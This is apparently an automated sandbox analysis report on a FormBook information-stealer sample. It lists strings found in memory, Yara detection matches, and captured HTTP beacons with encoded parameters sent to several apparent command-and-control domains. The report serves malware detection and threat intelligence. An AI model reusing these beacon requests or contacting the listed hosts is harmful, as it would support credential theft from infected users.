64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Virus/Spyware Download Bloc
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: divpCHa0h7.exe, 00000001.00000003.266066263.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comasno
          Source: divpCHa0h7.exe, 00000001.00000003.246781947.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: divpCHa0h7.exe, 00000001.00000003.246654381.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comX
          Source: divpCHa0h7.exe, 00000001.00000003.246591944.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/c
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn_
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cna-d
          Source: divpCHa0h7.exe, 00000001.00000003.248804655.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnl
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnr-f
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/CursJ
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Gras
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0zS
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a-e7
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ri
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
          Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: divpCHa0h7.exe, 00000001.00000003.247974313.00000000059E6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.ribbonofficial.com
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1Host: www.ribbonofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.sanlifalan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1Host: www.floaterslaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.mambacustomboats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: divpCHa0h7.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_0106D0641_2_0106D064
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_0106F2961_2_0106F296
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_0106F2981_2_0106F298
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_04F90D511_2_04F90D51
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_04F95A101_2_04F95A10
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0040102D5_2_0040102D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B8D35_2_0041B8D3
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B8D65_2_0041B8D6
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041C98B5_2_0041C98B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041C3435_2_0041C343
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00408C8B5_2_00408C8B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00408C905_2_00408C90
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00402D8C5_2_00402D8C
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2B0905_2_00F2B090
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD10025_2_00FD1002
